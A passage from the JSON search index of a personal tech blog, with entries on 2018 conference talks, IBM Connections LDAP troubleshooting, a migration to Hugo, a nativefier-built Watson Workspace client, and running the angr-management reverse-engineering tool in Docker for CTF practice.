class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T1S2-IBMConnectionsAdministrieren.html\" target=\"_blank\"\u003eIBM Connections Administrieren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T1S2-IBMConnectionsAdministrieren.pdf\" target=\"_blank\"\u003eIBM Connections Administrieren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S8-IBMConnectionsAdminblast.html\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S8-IBMConnectionsAdminblast.pdf\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S3-DockerWasIstDasEigentlich.html\" target=\"_blank\"\u003eDocker - Was ist das eigentlich? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S3-DockerWasIstDasEigentlich.pdf\" target=\"_blank\"\u003eDocker - Was ist das eigentlich? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDuring Admincamp I did a workshop about Docker too. I used a Jupyter Notebook to show all commands. As promised I uploaded all used files and the workbook in Jupyter and html format to Gitlab.\u003c/p\u003e","ref":"https://stoeps.de/speaking/2018/","title":"Talks 2018"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/docker/","title":"Docker"},{"body":"Today I had the pleisure to give a talk about Kubernetes Basics at the Docker Mannheim Meetup . I enjoyed it very much and we had some very good discussions after the talk with the traditional pizza and drinks sponsored by Stocard .\nA big shout-out to Jens and Martina for organizing the meetup!\nimage::https://pbs.twimg.com/media/DtMIBDtX4AEcmmG.jpg[width:480px]\nDuring the talk I promised that I will upload the slides and provide some more links:\nSession slides can be found here:\nKubernetes 101 Kubernetes 101 Links Kubetail Mastering Chaos - A Netflix Guide to microservices The DevOps 2.3 Toolkit , also available on Packtpub ","excerpt":"\u003cp\u003eToday I had the pleisure to give a talk about Kubernetes Basics at the \u003ca href=\"https://www.meetup.com/Docker-Mannheim\" target=\"_blank\"\u003eDocker Mannheim Meetup \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nI enjoyed it very much and we had some very good discussions after the talk with the traditional pizza and drinks sponsored by \u003ca href=\"https://stocardapp.com/en/de/\" target=\"_blank\"\u003eStocard \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eA big shout-out to \u003ca href=\"https://twitter.com/onwerk\" target=\"_blank\"\u003eJens \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://twitter.com/MartinaKraus11\" target=\"_blank\"\u003eMartina \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for organizing the meetup!\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20181129-dockermannheim/","title":"Kubernetes 101 - Docker Mannheim"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/talk/","title":"Talk"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibmcnx/","title":"IBMCNX"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/pink/","title":"Pink"},{"body":"Last week I attended Social Connections 14 in Berlin, the event location had a great view and weather was great.\nI had the chance to do a session on \u0026ldquo;Kubernetes Basics for IBM Connections Admins\u0026rdquo;. The session slides are attached on that post and there will be a video recording available some day at https://www.panagenda.com .\nKubernetes 101 The event was well organized (as always) of the awesome team Wannes, Maria, Simon, Nico, Martin and Jan. The sessions were very interesting, I attended:\nSTEP-BY-STEP INSTALLATION OF COMPONENT PACL of Martti Garden and Roberto Boccadoro IBM released the new version of Component Pack 6.0.0.6 in the night before Social Connections, the presenters showed it already. 6.0.0.6 is the first version which is not bundled with IBM Cloud Private and can be deployed on any Kubernetes environment.\nIBM CONNECTIONS – DEEP INSIGHTS FROM RUNNING AT LARGE SCALE of Patrick Spielmann BOSCH CONNECT – UNDER THE HOOD – 2018 EDITION of Daniel Glück and Serhar Şen RUNNING MICROSERVICES IN PRODUCTION WITH IBM of Nico Meisenzahl STABILISING A LARGE IBM CONNECTIONS ENVIRONMENT of Martijn de Jong Martijn and Patrick were first timers for talks at Social Connections, and they did a real good job. Thanks guys.\nAll presentations can be found at the Social Connections slideshare .\n","excerpt":"\u003cp\u003eLast week I attended Social Connections 14 in Berlin, the event location had a great view and weather was great.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20181022-socialconnections/","title":"Social Connections 14 in Berlin"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/admincamp/","title":"Admincamp"},{"body":"This week starts with Admincamp in Gelsenkirchen. Thanks Rudi Knegt and team for this awesome event! The conference or lets name it camp was real fun. In the end I did three sessions and a workshop. You can find download links to all slides and used files in this article or on https://stoeps.de/speaking/2018/ . I learned and heared a lot of interesting stuff around IBM Notes, IBM Connections and Sametime. You can get most of the session slides through the Admincamp agenda .\nSave the date! Next https://admincamp.de will take place from 25. to 27. March 2019 here in Gelsenkirchen.\nHere can you find my session slides (all talks were held in english), but maybe you can run them through deepl or Google Translate .\nLike most of my documentation, these slidedecks are written with https://asciidoctor.org using the reveal.js backend. Main advantage is the possiblity to put the content into a version control system like git. So the slides are delivered in HTML and later converted with DeckTape to pdf.\nLink goes to the reveal.js html file. Best viewed in fullscreen of your browser (F11). Additionally I added the PDF download file.\nIBM Connections Administrieren IBM Connections Adminblast Docker - Was ist das eigentlich? During Admincamp I did a workshop about Docker too. To get all basics for this workshop, you should have a look into the Session slides of the Docker 101 session . I used a Jupyter Notebook to show all commands. If you wanna run the dynamic parts, you need to install jupyter and the bash kernel for it. But you will learn more, if you type the commands to a console instead. As promised I uploaded all used files and the workbook in Jupyter and html format to Gitlab.\nGitlab with all files: https://gitlab.com/stoeps/ac2018-docker-handson Direct link to workbook: https://gitlab.com/stoeps/ac2018-docker-handson/blob/master/DockerHandsOn-Admincamp2018.ipynb if you open that directly at gitlab, it will render. Or you use the html copy of the document.\nAll files which are used in the workbook (Dockerfiles, Js, html) are all available in the repository. Please download as zip, or clone it with git.\nTo do all the practical stuff, you can download a live linux e.g. at https://ubuntu.com/Download and install Docker, or you install Docker native on your Windows, Mac or Linux Host. The installation procedure is documented on https://docs.docker.com .\n","excerpt":"\u003cp\u003eThis week starts with \u003ca href=\"https://www.admincamp.de\" target=\"_blank\"\u003eAdmincamp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Gelsenkirchen.\nThanks Rudi Knegt and team for this awesome event!\nThe conference or lets name it camp was real fun.\nIn the end I did three sessions and a workshop.\nYou can find download links to all slides and used files in this article or on \u003ca href=\"https://stoeps.de/speaking/2018/\" target=\"_blank\"\u003ehttps://stoeps.de/speaking/2018/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nI learned and heared a lot of interesting stuff around IBM Notes, IBM Connections and Sametime.\nYou can get most of the session slides through the \u003ca href=\"http://admincamp.de/AC18/Agenda\" target=\"_blank\"\u003eAdmincamp agenda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180917-admincamp-2018/","title":"Attending Admincamp 2018"},{"body":"During my talk at FrOSCon I wasn’t sure how to install Asciidoctor on Windows. So I tried on a Windows 10 VM.\nWhen you want to use Asciidoctor on a Windows desktop, you need to download the Rubyinstaller and install it.\nNow you can open a administrative command window and install with gem install asciidoctor.\nLet’s test with an easy document:\ntest.adoc\n= Test Asciidoctor on Windows :icons: font == Admonition NOTE: Will this work? TIP: Convert with `asciidoctor test.adoc` Update I had a typo in the conversion command, you can still see it in the screenshot. Sorry about that. You need to convert the source with asciidoctor test.adoc not .html!\nTo get the easy install into the documentation, I created a pull request at Github .\n","excerpt":"\u003cp\u003eDuring my talk at \u003ca href=\"https://www.froscon.de\" target=\"_blank\"\u003eFrOSCon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I wasn’t sure how to install Asciidoctor on Windows. So I tried on a Windows 10 VM.\u003c/p\u003e\n\u003cp\u003eWhen you want to use \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on a Windows desktop, you need to download the \u003ca href=\"https://rubyinstaller.org/downloads/\" target=\"_blank\"\u003eRubyinstaller \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and install it.\u003c/p\u003e\n\u003cp\u003eNow you can open a administrative command window and install with \u003ccode\u003egem install asciidoctor\u003c/code\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180825-asciidoctor-windows/","title":"Asciidoctor Windows"},{"body":"Today I attended Froscon 13 in St. Augustin. Froscon is one or the biggest event around Opensource in Germany. Thanks again to organizers sponsors of this awesome event, it was a pleisure to be here and have the chance to give a talk.\nThe slides for my session \u0026ldquo;Documentation with any editor\u0026rdquo; can be found at https://gitlab.com/stoeps/froscon18-presentation/blob/master/froscon13-documentationwithanyeditor.pdf .\nIf you’re interested and missed the talk, there is a video recording at https://media.ccc.de available.\nDocumentation with any editor Example files linked from session slides are stored in this Gitlab Repostitory https://gitlab.com/stoeps/asciidoctor-documentation-example , here you find the used build.gradle, Makefile and CI/CD configuration I normally use.\n","excerpt":"\u003cp\u003eToday I attended \u003ca href=\"https://froscon.de\" target=\"_blank\"\u003eFroscon 13 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in St. Augustin.\nFroscon is one or the biggest event around Opensource in Germany.\nThanks again to organizers sponsors of this awesome event, it was a pleisure to be here and have the chance to give a talk.\u003c/p\u003e\n\u003cp\u003eThe slides for my session \u0026ldquo;Documentation with any editor\u0026rdquo; can be found at \u003ca href=\"https://gitlab.com/stoeps/froscon18-presentation/blob/master/froscon13-documentationwithanyeditor.pdf\" target=\"_blank\"\u003ehttps://gitlab.com/stoeps/froscon18-presentation/blob/master/froscon13-documentationwithanyeditor.pdf \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180825-froscon13/","title":"Froscon13"},{"body":"Today I learned a new lesson during troubleshooting a IBM Connections System. I updated to 6.0 CR2, updated WebSphere to FP13, last fixpack for Docs and so on. You will ask if I added IFP88438 to the list, be sure that I installed this fix which reanables the root element in Federated Repositories. Have a look at WAS 8.5.5 FP12 breaks Domino \u0026ldquo;root\u0026rdquo; base entry setting for more details.\nThen one of the two deployments showed strange behavior with Activities. On the Activitystream I only got an orange error symbol instead of the Todo list and when I opened Activities directly I got an empty page.\nThe error log just said CLFRA0123E: Profile Provider Error and\nEJPVJ9367E: Unable to associate the login ID cnxadmin to the user ID 0C000000-EC0B-0E00-ADMI-N,OU=SVC,O=EXAMPLE,C=DE com.ibm.lconn.wikis.web.servlet.Application doGet The current user is not valid. All other applications worked, they showed similar errors in the log, but everything worked. TDI Synchronisation worked perfectly. I checked the databases and found that new admin profiles got created with this DN/UUID syntax. Normally I would expect a UUID here.\nA third system worked in that environment, but with different LDAP servers. All other applications (Sametime, Printer, Quickr) which used that server worked perfectly.\nSeveral restarts later, I checked everything.\nRollback Fixpack Install on WebSphere\nEnabled and disabled the administrator user.\nRedeployed Activities and so on.\nNothing helped!\nI could logon and only Activities had issues, so I decided to go back to a snapshot with CR1.\nWhat shall I say? Same error appeared…​\nSo I started a LDAP Browser and tried a search on the directory server (Domino LDAP System).\nOk, so the LDAP server has a problem, when I tried the directory search. Sorry about the german error message, it says:\nDirectory Search - [servername:port]\nAn error occurred when the schema was received. The schema entry from …​ does not seem to be valid, since the required attributes attributeType and objectClass with non-empty value sets do not exist. Try changing your credentials or the list of server-side access controls (ACL).\nA short view on the Domino LDAP server showed that the database index for names.nsf was missing, but that couldn’t be the root cause, because the LDAP server was used several months for authenticating WebSphere, Connections and Sametime.\nA short restart later and a new try …​ After the restart the ldap browser was able to search and gets results. Restarting Connections server and Activities showed up.\nWhat have I learned? A lot …​\nFirst of all it was a little surprise that the different applications of Connections do direct LDAP calls. I knew that Blogs do this, because the blogs ldap table never used the peopledb content, it collects the user informations directly. The Activities lookups seems very long, because in my experience only longer queries have problems with missing indexes on directory databases. Failover LDAP servers are useful for outages, but when a LDAP server provides wrong or short returns, these are valid and do not force a switch to other LDAP server.\nAs best practise I learned that I could save a lot of time, when WebSphere fixpacks and interim fixes are deployed seperatly, not in one big step. For example you can install WebSphere 8.5.5.13 with some IFP in one step, just with adding the repositories in Installation Manager. When you want to do a rollback, this is not possible. So installing first 8.5.5, then Fixpack 13 and in a third step the IFP creates 2 possible rollback positions.\n","excerpt":"\u003cp\u003eToday I learned a new lesson during troubleshooting a IBM Connections System.\nI updated to 6.0 CR2, updated WebSphere to FP13, last fixpack for Docs and so on.\nYou will ask if I added \u003ca href=\"https://www-01.ibm.com/support/docview.wss?rs=180\u0026amp;uid=swg1PI88438\" target=\"_blank\"\u003eIFP88438 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to the list, be sure that I installed this fix which reanables the \u003ccode\u003eroot\u003c/code\u003e element in Federated Repositories.\nHave a look at \u003ca href=\"https://techblog.gis-ag.info/2017/12/21/was-8-5-5-fp12-breaks-domino-root-base-entry-setting/\" target=\"_blank\"\u003eWAS 8.5.5 FP12 breaks Domino \u0026ldquo;root\u0026rdquo; base entry setting \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for more details.\u003c/p\u003e\n\u003cp\u003eThen one of the two deployments showed strange behavior with Activities.\nOn the Activitystream I only got an orange error symbol instead of the Todo list and when I opened Activities directly I got an empty page.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180816-always-check-the-ldap/","title":"Always have a look at the LDAP"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ldap/","title":"LDAP"},{"body":"I switched my blog to Hugo the last days. After nearly 12 years with WordPress , I needed something new. Why did I drop WordPress, one of the most used blog engines in the world?\nMost used means always most interesting for bad guys. Dynamic pages are slower and can contain more vulnerabilities than static pages (which Hugo generates). Hugo supports git, so I have version control in my posts and design. I can start a small web server locally and test the posts: hugo server -D and the most convenient thing: I can use VIM for editing.\nVIM is THE editor for me, I tried using it with vim-anywhere with my browsers, but it’s still not the same.\nThe last years I wrote most of my blog posts in markdown , but most of my other writing is done with asciidoc . The WP markdown plugin was quite good, but I never was happy with the ones for asciidoc. So I converted my writing with pandoc and uploaded it to WordPress. I prefer asciidoc over markdown, because I can do way more things (like include source files in my documentation) and it is still easy readable in any editor. The tool for working with asciidoc sources is asciidoctor !\nHugo Helpers support markdown, restructured Text, pandoc and asciidoctor . So no conversion needed during writing.\nMigration I used https://github.com/SchumacherFM/wordpress-to-hugo-exporter to convert all WordPress posts to markdown. This export can directly be used with your new Hugo site. I tweaked some more stuff, because I wanted to use asciidoc for all posts, so I converted everything with pandoc to asciidoc. Then I adjusted some text which was not WP default (like syntax highlighted source, some links) with sed.\nSo all old posts are migrated and available with their old URL! Nothing to tweak or change in Apache or .htaccess. Users from search engines get directly to the posts.\nThe only thing I did not migrate were comments on posts and I will not enable discuss comments with Hugo. If you want to discuss something with me, write on Twitter or drop me a mail.\nHugo offers a lot of themes , I decided to use a bootstrap enabled one . I forked the theme and updated to a new https://fontawesome.com version, added some parameters to enable or disable sharing icons. Some little CSS adjustments for asciidoc paragraph elements like WARNING or NOTE are needed too.\nFroscon In August I will give a talk at https://froscon.org about asciidoc and using any editor for documentation. So more details on asciidoc(tor) will follow.\nDocker Asciidoctor is also available as a docker image , so it is easiest to use and you needn’t install a ton of requirements or dependencies. Or you can use it within your build pipeline to have a up-to-date documentation.\n","excerpt":"\u003cp\u003eI switched my blog to \u003ca href=\"https://gohugo.io\" target=\"_blank\"\u003eHugo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the last days. After nearly 12 years with \u003ca href=\"https://wordpress.com\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, I needed something new.\nWhy did I drop WordPress, one of the \u003ca href=\"https://w3techs.com/\" target=\"_blank\"\u003emost used blog engines \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the world?\u003c/p\u003e\n\u003cp\u003eMost used means always most interesting for bad guys.\nDynamic pages are slower and can contain more vulnerabilities than static pages (which Hugo generates).\nHugo supports git, so I have version control in my posts and design.\nI can start a small web server locally and test the posts: \u003ccode\u003ehugo server -D\u003c/code\u003e and the most convenient thing: \u003cstrong\u003eI can use \u003ca href=\"https://www.vim.org\" target=\"_blank\"\u003eVIM \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for editing.\u003c/strong\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-07-14-new-blog-engine/","title":"New Blog Engine"},{"body":"A long pause after creating the last linkdump. Not sure why, because I read a lot. So this time some of my readings on Kubernetes, Security and Vim.\n* Interesting career: Lessons from My Strange Journey into InfoSec * Developer Tools are very useful for all kind of users. I like them to troubleshoot webpages, IBM Connections and more. Essential Chrome Developer Tools: Beginner to Master * Replacement for WebSphere and JBoss? Why Kubernetes is The New Application Server - RHD Blog * Some networking for Kubernetes. Think Before you NodePort in Kubernetes - Oteemo * Maybe to late for me (on the crazy part). How to Use Slack and Not Go Crazy | Inside PSPDFKit * Basics about writing good shell scripts. 13 Tips \u0026amp; Tricks for Writing Shell Scripts with Awesome UX * I think I work mostly on the console within tmux or ssh sessions. ZSH is great to speed me up and gives me a colorful fast console. How to Setup ZSH and Oh-my-zsh on Linux * Jupyter notebooks are great to get python or analytics into powerful and dynamic documents, but it also very useful with scripts, SQL and so on. Jupyter: notebooks for education and collaboration * A new topic for me, but a good starting point on Deep Learning. A “weird” introduction to Deep Learning * I use it little longer, now after 15 years it feels familar, but every minute is worth invested into learning VIM. You can get very very fast. Nine months with Vim * Interesting for vim users, but also for managing dotfiles and projects with sub git repositories. git submodule is really cool and I long ignored it. Synchronizing plugins with git submodules and pathogen * German, but quite interesting: DevOps als Treiber für agiles und schlankes IT-Servicemanagement Addition - not a read, but watch it Since my last post Martin Leyrer did a really interesting and entertaining talk during Gulasch Programmiernacht . If you wanna learn new commandline tools and extend your console knowledge, watch it!\nIt’s in austrian/viennese!\nModerne Kommandozeilen Werkzeuge auf der GPN18\u0026quot;\u0026gt;Recording des GPN18 Vortrags auf media.ccc.de Slidedeck Moderne Kommandozeilen Werkzeuge @ GPN18 ","excerpt":"\u003cp\u003eA long pause after creating the last linkdump. Not sure why, because I read a lot.\nSo this time some of my readings on Kubernetes, Security and Vim.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-07-13-linkdump-4-2018/","title":"Linkdump 4/2018"},{"body":"IBM Docs Viewer can open source files with syntax highlighting. This feature is default disabled, but sometimes very useful.\nYou need to enable it with IBM Connections Gatekeeper.\nBe aware that most of Gatekeeper settings are not officially supported by IBM and can have side effects! Open Gatekeeper with https://your-connections-fqhn/connections/config\nNow search for FILEVIEWER_PREVIEW_TEXT and change the value to True.\nNow when you open an html (or other text file) from IBM Connections Files it will open a preview and after a short flickering of the document the source is highlighted.\nWithout that setting you just see a message like “no preview available for this” and a download option:\nGatekeeper settings can be set in real-time, so no restart of Connections is needed to enable or disable this feature. I tested the preview with html, js and css, but I think nearly everything with mime-type text is possible.\nUpdate 2018-06-15 You need the admin role of the Common Application to access the gatekeeper!\n","excerpt":"\u003cp\u003eIBM Docs Viewer can open source files with syntax highlighting. This feature is default disabled, but sometimes very useful.\u003c/p\u003e\n\u003cp\u003eYou need to enable it with IBM Connections Gatekeeper.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-06-14-enable-preview-for-source-files-like-html-or-css-with-ibm-docs-viewer/","title":"Enable Preview for source files like html or css with IBM Docs Viewer"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/file-viewer/","title":"File Viewer"},{"body":"Watson Workspace Clients are only available for Windows and Mac OS. I’m a 100% Linux user on my devices and I use a Windows virtual machine only if I can’t avoid it. To communicate with colleagues, IBM and DNUG I need to use Watson Workplace, opening the web view is possible, but then I need to search the right tab or forget to open it. Since some weeks there is Zoom (Web / Video meetings) integrated with Watson Workspace too.:\nWatson Workspace clients are based on Electron . I’m not a big fan of Electron clients, most of them are big and need tons of system resources. There is enough written about advantages and disadvantages, so I just leave it that way.\nThe last time I used Rambox and configured for Smartcloud, some Slack spaces and Watson Workplace, but I wasn’t completely satisfied. I’m a member of around 12 Slack spaces, so I switched back to the native Slack client and uninstalled Rambox. I just wanted something to use Watson Workplace outside of my browsers. One reason is the single sign-on feature within the IBM web pages. I use several IBM IDs to download software, use Smartcloud Connections or Developerworks. So an always logged in WW and the very sticky cookies around these services are a pain.\nToday I found a new way! I read about nativefier in my news feed and just wanted to try using it.\nThe project is based on Node.js and uses npm for installation. Node.js has lots of dependencies and I don’t want to have all that tools on my working machine. So I cloned the repository and build the docker image.\ngit clone https://github.com/jiahaog/nativefier.git cd nativefier docker build -t local/nativefier . Now I can build everything from that docker container.\nI downloaded a Watson logo and put it on the path where I want to build the client.\ncd ~ mkdir -p ~/tools/watsonworkspace cp Downloads/ww-logo.png ~/tools/watsonworkspace cd ~/tools Build the application docker run --rm \\ -v $(pwd)/watsonworkspace:/target \\ local/nativefier \\ --icon /target/ww-logo.png \\ --name \u0026#34;Watson Workspace\u0026#34; \\ https://login.workspace.ibm.com/ \\ /target/ Start docker, run a container based on image local/nativefier and delete (--rm) the container after the run.\nThis maps a volume from local path /watsonworkspace and maps within the container to /target.\nAdds an icon to the program and adds the name Watson Workspace.\nIs the login URL of Watson Workspace. When you log in there and restart the client, you’re still logged on.\nAfter running the container you find a new directory with ~/tools/watsonworkspace and you can start your personal build Electron client with ~/tools/watsonworkspace/watson-workspace-linux-x64/watson-workspace. I created an autostart entry to start it each time I log in, or you can add it to the menu or desktop. The best thing about nativefier is, it works on Mac OS and Windows too. So you can add every URL you want to have a separate login or browser window.\nZoom on Linux Within the Workspace client, I can start a meeting (when I have a pro account) and I can open it directly with Zoom (which is available for Linux too). So it’s not integrated into my Workspace client, but it opens without prompting in a Zoom client window. Great stuff!\n","excerpt":"\u003cp\u003e\u003ca href=\"https://www.ibm.com/collaboration/collaboration-tools/watson-work/workspace\" target=\"_blank\"\u003eWatson Workspace \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Clients are only available for Windows and Mac OS. I’m a 100% Linux user on my devices and I use a Windows virtual machine only if I can’t avoid it.\nTo communicate with colleagues, IBM and DNUG I need to use Watson Workplace, opening the web view is possible, but then I need to search the right tab or forget to open it.\nSince some weeks there is \u003ca href=\"https://zoom.us/\" target=\"_blank\"\u003eZoom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (Web / Video meetings) integrated with Watson Workspace too.:\u003c/p\u003e\n\u003cp\u003eWatson Workspace clients are based on \u003ca href=\"https://electronjs.org\" target=\"_blank\"\u003eElectron \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I’m not a big fan of \u003ca href=\"https://electronjs.org\" target=\"_blank\"\u003eElectron \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n clients, most of them are big and need tons of system resources. There is enough written about advantages and disadvantages, so I just leave it that way.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-03-29-build-your-own-watson-workspace-linux-client/","title":"Build your own Watson Workspace Linux Client"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/watson-workspace/","title":"Watson Workspace"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/angr/","title":"Angr"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ctf/","title":"CTF"},{"body":"Today I have a topic from outside the yellow world.\n== Disclaimer\nAny actions and or activities related to the material contained within this Website and post is solely your responsibility.The misuse of the information on this website can result in criminal charges brought against the persons in question. The author and https://www.stoeps.de/ will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.\nSince several years I’m interested in IT Security. I do a lot of troubleshooting with so-called hacker tools, but they are really useful in my daily work life! So I started to learn more about this tools. Good resources to learn using Kali Linux, Burpsuite or Metasploit are vulnerable VMs or services like Hack the box . During this challenges and watching the videos of LiveOverflow I played with IDA Free and Radare2 to reverse special prepared binaries. Reading the disassembled code is not that hard, but a challenge.\nIn a video from Def Con 23 I heard the first time from angr and I like it very much. There is a GUI for it too, but I couldn’t install the dependencies on my Ubuntu machine. In Kali Linux it worked perfectly, but not on the local installation.\nOn Docker Hub you can download a ready installed container with the latest angr-management. This container uses your local X Server, so you need to use some parameters for the start and you can map a local path into the container that you can access the binaries:\ndocker run --name angr-mgmt -e QT_X11_NO_MITSHM=1 -e DISPLAY=$DISPLAY -v $PWD:/home/angr/pwd -v /tmp/.X11-unix:/tmp/.X11-unix angr/angr-management So what does this all mean?\n--name angr-mgmt: I give the container a name, so I can start it again with docker start angr-mgmt\n-e QT\\_X11\\_NO_MITSHM=1: Without that I got security errors during the X Server access, but in that thread I got the information that it’s faster to use –ipc host instead\n-e DISPLAY=$DISPLAY: Add environment variable $DISPLAY\n-v $PWD:/home/angr/pwd: map the path you’re now to the container path /home/angr/pwd\n-v /tmp/.X11-unix:/tmp/.X11-unix: map the local path to the container path to access X\nangr-management: name of the docker image\nFinal container command docker run --name angr-mgmt --ipc host -e DISPLAY=$DISPLAY -v $PWD:/home/angr/pwd -v /tmp/.X11-unix:/tmp/.X11-unix angr/angr-management Testing the software As a first test I opened a example binary from the angr documentation named crackme0x00a. That’s a very easy binary (used in lots of tutorials) , because the used string can be found as a string in the disassembled code, but I think you get a picture of angr:\nUpdate 2018-03-08 Today I tried some more things from the documentation and behind some links, I found: https://github.com/angr/angr-management/blob/master/run-docker.sh , so the Docker start can be done with the shell script on Github. There is a second one for Mac OS X too.\n","excerpt":"\u003cp\u003eToday I have a topic from outside the yellow world.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-03-07-running-angr-management-in-docker/","title":"Running Angr-Management In Docker"},{"body":"The last two weeks I didn’t read that much, I checked some Youtube videos and blogs about CTF and pentesting. One of the most impressive ones are the LiveOverflow videos and blogposts . So when you’re interested in that topic too, just check the links above.\n* A real good story on a fictive thread on the NodeJS ecosystem. * Awesome link collection all around CTF can be found on Github. * I often asked me that question, maybe you find the answer interesting too: Does It Help When I ‘Like’ My Company Facebook Posts? – Ben Brausen * That’s a big wish from me to implement this in the sooner future. Even as an administrator there are tasks you can automate, like building documentation from Asciidoc, or doing screenshot with selenium. Set Up a CI/CD Pipeline with Kubernetes Part 1: Overview ","excerpt":"\u003cp\u003eThe last two weeks I didn’t read that much, I checked some Youtube videos and blogs about \u003ca href=\"https://en.wikipedia.org/wiki/Capture_the_flag\" 